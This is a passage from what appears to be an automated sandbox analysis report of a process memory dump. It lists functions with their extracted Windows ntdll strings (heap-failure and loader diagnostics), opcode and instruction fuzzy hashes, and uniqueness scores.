HEAP[%wZ]: , xrefs: 01301C30, 01301CF7, 01301D42, 01301D8B, 01301DD4, 01301E25, 01301E6D
Parameter3: %p, xrefs: 01301DEE
Last known valid blocks: before - %p, after - %p, xrefs: 01301E45
heap_failure_buffer_overrun, xrefs: 01301C98
heap_failure_cross_heap_operation, xrefs: 01301CC2
heap_failure_multiple_entries_corruption, xrefs: 01301C8A
heap_failure_entry_corruption, xrefs: 01301C83
heap_failure_listentry_corruption, xrefs: 01301CD0
Error code: %d - %s, xrefs: 01301D12
heap_failure_generic, xrefs: 01301C7C
heap_failure_block_not_busy, xrefs: 01301CA6
heap_failure_freelists_corruption, xrefs: 01301CC9
heap_failure_usage_after_free, xrefs: 01301CBB
heap_failure_internal, xrefs: 01301C6E
heap_failure_lfh_bitmap_mismatch, xrefs: 01301CD7

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: b684d12f618363ad086d5a57213ca4aa0cfc0ab745b6129207ab68526a5678a0
Instruction ID: 79aa26e161bd58424966b9908d5595f719b16b8b8c90ab958102ac3c0abbb6e5
Opcode Fuzzy Hash: b684d12f618363ad086d5a57213ca4aa0cfc0ab745b6129207ab68526a5678a0
Instruction Fuzzy Hash: BE61CF73631149DFD726AB99E4A5E3477E8EB54B24F0A802AF90E5F781D634DC40CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 01253D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01253D6F
Kernel-MUI-Language-Disallowed, xrefs: 01253E97
Kernel-MUI-Language-Allowed, xrefs: 01253DC0
Kernel-MUI-Number-Allowed, xrefs: 01253D8C
Kernel-MUI-Language-SKU, xrefs: 01253F70

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: d31917ce99394d3738ff1aac614bbe1fdf6cbe37e300de426bc76a2e7c85108a
Instruction ID: f4b94d432edd73fcb8fccb9bd566c4e8f21178404e948c19b5a39ca15426b87d
Opcode Fuzzy Hash: d31917ce99394d3738ff1aac614bbe1fdf6cbe37e300de426bc76a2e7c85108a
Instruction Fuzzy Hash: CBF15172D2025AEFCF15EF98C980AEEBBB9FF18750F14005AE905A7250E7749E41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012440E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

Invalid heap signature for heap at %p, xrefs: 012A0458
HEAP[%wZ]: , xrefs: 012A043F
RtlAllocateHeap, xrefs: 012A0468
, passed to %s, xrefs: 012A0469
HEAP: , xrefs: 012A044C

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: da80b6d83ae71492544a480b16e892077475dc24992c029b3a897e77fa4570f8
Instruction ID: 0342d51ee2bb5ffd7085f58155d0f15166cb6404e1e861caf0f15d5b7c6cd104
Opcode Fuzzy Hash: da80b6d83ae71492544a480b16e892077475dc24992c029b3a897e77fa4570f8
Instruction Fuzzy Hash: 51014733134292BFE32D9B79E40EF6A7BA4EB00B30F18802DF50957641CAE4D880C628

Uniqueness

Uniqueness Score: -1.00%

Function 01278E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON

Download Yara Rule

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 012B932A
LdrpFindDllActivationContext, xrefs: 012B9331, 012B935D
Querying the active activation context failed with status 0x%08lx, xrefs: 012B9357
minkernel\ntdll\ldrsnap.c, xrefs: 012B933B, 012B9367

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 7c1679b82732b409662c19067d98ffa96ea464326149bde219b0ed8f21fb986b
Instruction ID: bfd3be0d9c734aac24e8769d3923c20dbc2d2c4946f1af38c02a01e7ab6dcec9
Opcode Fuzzy Hash: 7c1679b82732b409662c19067d98ffa96ea464326149bde219b0ed8f21fb986b
Instruction Fuzzy Hash: C5410D32A30317AFEF36AB1CD88DB7776B5AB04754F054969FB0897152E7B05D808381

Uniqueness

Uniqueness Score: -1.00%

Function 013049A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01304A3D, 01304AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01304A61
HEAP: , xrefs: 01304A4A, 01304A5D, 01304A5F, 01304AC4
This is located in the %s field of the heap header., xrefs: 01304AD6

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 39e739eb36aafb58d33809801ac7e6ba91e0739477abf81a94b356b4b85bd0cb
Instruction ID: b9b72b08502126028ad324f6ea5bedf5cc13d8f818ee0e38ffaffd56da12fa1e
Opcode Fuzzy Hash: 39e739eb36aafb58d33809801ac7e6ba91e0739477abf81a94b356b4b85bd0cb
Instruction Fuzzy Hash: 32312636620214FFE722DF6DC899F6B77E8EF04628F144059F6058B291DA71EA80C769

Uniqueness

Uniqueness Score: -1.00%

Function 01258794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON

Download Yara Rule

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 012A9C18
LdrpDoPostSnapWork, xrefs: 012A9C1E
minkernel\ntdll\ldrsnap.c, xrefs: 012A9C28

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 383a808bf92ab9d33ca59c458380fc1ea5d1c52e79675da2e3e0c6f20fa7b2f2
Instruction ID: b52fd3a664dbf502fd5bd0d780d3aa87decfcfa224280201e7defc60f1242611
Opcode Fuzzy Hash: 383a808bf92ab9d33ca59c458380fc1ea5d1c52e79675da2e3e0c6f20fa7b2f2
Instruction Fuzzy Hash: FD910231A2021BEBEF98DF5AD4C5ABAB7B5FF44314F444169DE01AB240E7B0E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01257E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrmap.c, xrefs: 012A98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 012A9891
LdrpCompleteMapModule, xrefs: 012A9898

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 4565b596ae3f73aee7f892919c381092e064538d84b53503f30ee3a30058aa06
Instruction ID: 0670b8d5fee2a02d7d041853a016cd6a4ff6924131e08895886d5fd03eb27ab3
Opcode Fuzzy Hash: 4565b596ae3f73aee7f892919c381092e064538d84b53503f30ee3a30058aa06
Instruction Fuzzy Hash: 80510031670742DFEB22CB6DC984B2A7BE4AB00718F8406A9EE519B3D1D774ED40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0124E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0124E68C
InstallLanguageFallback, xrefs: 0124E6DB
@, xrefs: 0124E6C0

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: fb19574ae9f83a4d8898aea070ffaa5f8507bf82dbe407690174948aaf42314a
Instruction ID: b987effc0eb4808235e4ab86a75bf70aa2ee94da4ea8ec9bd061c34b524f1636
Opcode Fuzzy Hash: fb19574ae9f83a4d8898aea070ffaa5f8507bf82dbe407690174948aaf42314a
Instruction Fuzzy Hash: 9A51BD726293469BD719EF28C440A7BB7E8FF88714F45092EFA85D7250F734DA0487A2

Uniqueness

Uniqueness Score: -1.00%

Function 0130E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON

Download Yara Rule

Strings

`, xrefs: 0130E5D7
`, xrefs: 0130E670

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 7766fc7ef94d8b43926fa98dda43ea220f2c15d6de02c49043f42e0bdf9c8142
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 7F918F713043469BE726CE29C851B2BBBE5AF84B28F148D2DF695CB2C0E774E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012C51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

UEFI, xrefs: 012C521D
Legacy, xrefs: 012C5226

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 8da84eb58a75630cd9c35ec339af4f131ab81c14d29c8cea7d863fc40c440fce
Instruction ID: 5334c765b43bd13299fb7f36f394f5836f1871cc12878e319d3d36557c86e42a
Opcode Fuzzy Hash: 8da84eb58a75630cd9c35ec339af4f131ab81c14d29c8cea7d863fc40c440fce
Instruction Fuzzy Hash: 5E518171A606199FDB15DFA8C880AADBBF9FF44B00F14412DE649EB291DA71E940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0124B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 012A48AD

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: eb72e333eec8ef1e2db747b0f0069bdb5d1e9a25488435bb2ca5fdf3a440311f
Instruction ID: c9c5f5be8ae9b64fd9be817ec1e9dee06a8ebe36109f87a3f7e97e5f49c8456f
Opcode Fuzzy Hash: eb72e333eec8ef1e2db747b0f0069bdb5d1e9a25488435bb2ca5fdf3a440311f
Instruction Fuzzy Hash: 6451F471D2029A8FDF35EF68C845BBEBBB0BF00710F5841ADD9599B282D7B08945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0126B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0126B9A5

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 09d25ce13c4311cc65de9500f74cdf7aa9a482247dc26d19d512784fe7ef42d8
Instruction ID: 61e54bf8afac89f4e2559bb7909fcee3cd944b5d7c79ab8ef2c6fe742d633671
Opcode Fuzzy Hash: 09d25ce13c4311cc65de9500f74cdf7aa9a482247dc26d19d512784fe7ef42d8
Instruction Fuzzy Hash: B1514A71629342CFC720DF29C08092ABBE9FB88654F14496EFA95C7395D771EC84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01272581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 01272642, 01272691

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 2f67faead5b84f70833a9b36d711f73875bf5351c79fe0d2196cd16caf7fa7d2
Instruction ID: 0db713f8b3a6abe78cdb4e3ab637a53bfb36eec2a37406cb600fb23edc2c6feb
Opcode Fuzzy Hash: 2f67faead5b84f70833a9b36d711f73875bf5351c79fe0d2196cd16caf7fa7d2
Instruction Fuzzy Hash: 17C19071D2021ADFDB29DF99D981BBEBBB5FF48740F084029E901BB250E774A941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0127FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 012BBE0F

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4fd0d9f2f4f93b0a88db12773fd5ee0c4dacd799e282de5818086ccb02caf685
Instruction ID: 17340f02ca880736bf4a3aa13b0f1a0125884e1b6732d063944d1540d6d7fe27
Opcode Fuzzy Hash: 4fd0d9f2f4f93b0a88db12773fd5ee0c4dacd799e282de5818086ccb02caf685
Instruction Fuzzy Hash: C1A10471B246078BEB25CF68C590BBBB7A4AF48710F04456DEB26DB690EB74D841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01242D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0129FA4A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 576ab544678e779c8116462a957e813375f2a163ff0a194a2997156aa2c1a83d
Instruction ID: 51b37dbcaf0aa04cbae41ef708e0270eab57c340437bc322c075a2394621e2f4
Opcode Fuzzy Hash: 576ab544678e779c8116462a957e813375f2a163ff0a194a2997156aa2c1a83d
Instruction Fuzzy Hash: 4E615331B20606EFEF36DF6DD980B7E7BA4EB44724F1406A9EA11D72C1C778A9008791

Uniqueness

Uniqueness Score: -1.00%

Function 01310EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01310F16

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 3f21533747b718fa2659900502fd9075517d7dfa5486d5e7bf9adb8e0938045c
Instruction ID: 98d613a37e3fa19e1b8a40ba65f3f42278eef2a6df46d3e4ac4efc6e2d3d712a
Opcode Fuzzy Hash: 3f21533747b718fa2659900502fd9075517d7dfa5486d5e7bf9adb8e0938045c
Instruction Fuzzy Hash: A051C3717043429FE329DF28D884B6BBBE9EBC4708F04092CF68697294D770E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0127F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 0127F124

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: b0204b3678a5f7824435f514b3d5ad1491c4b72277cb02c0d1782363b382f49f
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: BD51B0715157119FC321DF18C840A6BBBF8FF88710F00892DFAA587690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 012C358F

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: fae951b51eafd901d879655092c141f82c1e73634760d9e96b3d3b9b3cc95e9d
Instruction ID: 60224d0b46cd4e69e9476267f85a5c0807495fcb027fe5ef4aa0b50742a42411
Opcode Fuzzy Hash: fae951b51eafd901d879655092c141f82c1e73634760d9e96b3d3b9b3cc95e9d
Instruction Fuzzy Hash: 584125B1D1152D9FDB21DA50CC80FEEB77CAB54714F1086A9E709A7241DB309E88CF98

Uniqueness

Uniqueness Score: -1.00%

Function 013105AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 01310633

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 443a7871eb51b1c571a69db6e17c63a5773ad84416b6552eeb88faad435130c3
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CF31E2322043066BE718DE28CC44F967BD9EB84768F144629FA54EB2C4D670E944C791

Uniqueness

Uniqueness Score: -1.00%

Function 012C3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 012C38B4

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: c137dae90e228f495822522a3d7f1c3e0836d3be3c695d3b8ca0930e1fb7164f
Instruction ID: fec9c818116fcde670d7b514c4df39074a87893f9de3c2f74e4b59deed48407c
Opcode Fuzzy Hash: c137dae90e228f495822522a3d7f1c3e0836d3be3c695d3b8ca0930e1fb7164f
Instruction Fuzzy Hash: F431E53291151AEFDB15DA58C945DBFBB74FB80B20F01866DEB15A7290D7309E40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0127D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0127D303

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9530731e789499f5e0de6da9109ea8161316e175af081a564a0486a8ec3cea3e
Instruction ID: f7504a33ecf0f2e065aff9310605b9fee429fe76b9b6456a6b2e6d62d6273445
Opcode Fuzzy Hash: 9530731e789499f5e0de6da9109ea8161316e175af081a564a0486a8ec3cea3e
Instruction Fuzzy Hash: DE31C2B156930A9FC711DF68C881AABBBE8EFC5754F00092EF99583250D634ED44CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 01251B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01251BC5

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c194b31cef1393fe0c6deca75963e01813a35bf9ea7eb84cf019fc5c0341dfba
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: CF21073A57122AABDB629A59C8C0F6FBBADEF41B51F054425FF049B200D636DC10C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0126F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 0126F73F

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 5bc44855a25bdcc80522c0f57bce9eecfb00fa4255c65d16c820a32ab6f6d01a
Instruction ID: 5f4945003348198410177b3fb96615c828c0346527267d7aa7cb9739cb8e6c79
Opcode Fuzzy Hash: 5bc44855a25bdcc80522c0f57bce9eecfb00fa4255c65d16c820a32ab6f6d01a
Instruction Fuzzy Hash: 4E1184353347038BEF2F4D1DABB2675769DAB95654F24452AD661CB3D1DAB8C8C0C340

Uniqueness

Uniqueness Score: -1.00%

Function 012F8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 012F8E21

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 656de013c613ab973ff22c3927f283883bd13460af385a0feee9150e47d9bfbb
Instruction ID: e1cb0cba2a34ac29b20416913fbac52d9fe4bb851433a36192e3b925697dcd65
Opcode Fuzzy Hash: 656de013c613ab973ff22c3927f283883bd13460af385a0feee9150e47d9bfbb
Instruction Fuzzy Hash: 53115BB5D25349DBDF29DFA886067ACFBB0BB14314F20426DE669AB292C3740602DF14

Uniqueness

Uniqueness Score: -1.00%

Function 012DFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 012DFF60

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: e8375731c023041f58cd0df95ba5150a176427c055898cf3fe3ea5fcd24ca234
Instruction ID: e55172d17fa21f23953cf357333bf34c4c35dfa670b59e7c4c1e7d8e2c1cd835
Opcode Fuzzy Hash: e8375731c023041f58cd0df95ba5150a176427c055898cf3fe3ea5fcd24ca234
Instruction Fuzzy Hash: CB110471930149EFDF26DF54CA49FA8BBB1FF04704F148084E205572A1C7389940DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01315BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecb58df5f7a4d8f74e875cf44eeb47a0ddf3b704573d75a9a75ae9ebd539f30
Instruction ID: e8efd2500ec86f2397a80fd069ba0e9e6b52b923d42028453892653946479ace
Opcode Fuzzy Hash: 1ecb58df5f7a4d8f74e875cf44eeb47a0ddf3b704573d75a9a75ae9ebd539f30
Instruction Fuzzy Hash: D7427DB5D10229CFDB24CF68C881BA9BBB1FF45308F1481AAD94DEB256D7709A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01264120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ceaef860572daec8b79ad0babcec707f7101198484d7963a52dabf5fe1dd33
Instruction ID: 305e996360f9a7673bb3015be378b246573d6c2f7b4a4157fb3cf7b906c1dd17
Opcode Fuzzy Hash: d0ceaef860572daec8b79ad0babcec707f7101198484d7963a52dabf5fe1dd33
Instruction Fuzzy Hash: 2CF1AF706282928FC724EF18C481A3AB7E5FF98714F55492EF6C6CB290E774D891CB52

Uniqueness

Uniqueness Score: -1.00%

Function 012720A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18dffeb1c7cc2483ffb43c31a50460c543b2c2d59a22e8ed47fdb7b4e2075c8
Instruction ID: 9349a889ce2cc2482b05622dcfd5784954a7d206550dd1e11b1d018f1795fa46
Opcode Fuzzy Hash: d18dffeb1c7cc2483ffb43c31a50460c543b2c2d59a22e8ed47fdb7b4e2075c8
Instruction Fuzzy Hash: 40F12270A28342DFE726CF2CC88176B7BE5BF85364F08851DEA959B281D774D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0125D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c66c1efea0c343b519fb98202d8eb7affab4f0158ca584d424c25520dc406b8
Instruction ID: 5336bdc7be2c6f4f368380ef0cfaf61fb4026c9a6bb9985cbbe4cb8d78f71b91
Opcode Fuzzy Hash: 0c66c1efea0c343b519fb98202d8eb7affab4f0158ca584d424c25520dc406b8
Instruction Fuzzy Hash: 8BE1E130A2035ACFEB74DF68C894B79BBB5BF85304F040199DE0997291D7749D81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0125849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4b9f434fa313afd141a2a22664294ef56e89bb35809e15ea7c1b16479e764c
Instruction ID: 47a8d3dcaf7e0e65aa01d379dcbe71c2ea9f71a8590730cb901044ee27fae876
Opcode Fuzzy Hash: 6f4b9f434fa313afd141a2a22664294ef56e89bb35809e15ea7c1b16479e764c
Instruction Fuzzy Hash: 1DB15DB4E2020ADFDF19DF9AC9C4AADBBB9FF44304F10412AE905AB345D7B4A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0127513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60068b532a80fc480a444d0842dee78c8fa507786ac7fda170480abffcc889ac
Instruction ID: 3b98d9084e17239d361132f554f18859614099931b0aa2022675f5c2ea821846
Opcode Fuzzy Hash: 60068b532a80fc480a444d0842dee78c8fa507786ac7fda170480abffcc889ac
Instruction Fuzzy Hash: B4C134755193818FD354CF28C580A6AFBF1BF88304F18896EF9998B392D771E985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 012703E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ca713dcd32c9eda48e7d5c1fdef0a17b382494ff2e7c4920d5d7ab07626fe8
Instruction ID: a73c4dea0caec96546fd3cfcc6843f7e1224fc770974fdeca773002a9cf2d9dd
Opcode Fuzzy Hash: 83ca713dcd32c9eda48e7d5c1fdef0a17b382494ff2e7c4920d5d7ab07626fe8
Instruction Fuzzy Hash: 0C915831E202569FEB31AB6CC884BFE7BA4EB02764F050265FB12A72D2D7749D44C785

Uniqueness

Uniqueness Score: -1.00%

Function 0124C600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a9e97be852db56c328631e2c449df3edf6969ef7076b6d30ff7e7e6a3b8fcd
Instruction ID: 850680aab9d5faa85dd46014626243eebf1cd2751752a1e2438c1d8a44176efa
Opcode Fuzzy Hash: 85a9e97be852db56c328631e2c449df3edf6969ef7076b6d30ff7e7e6a3b8fcd
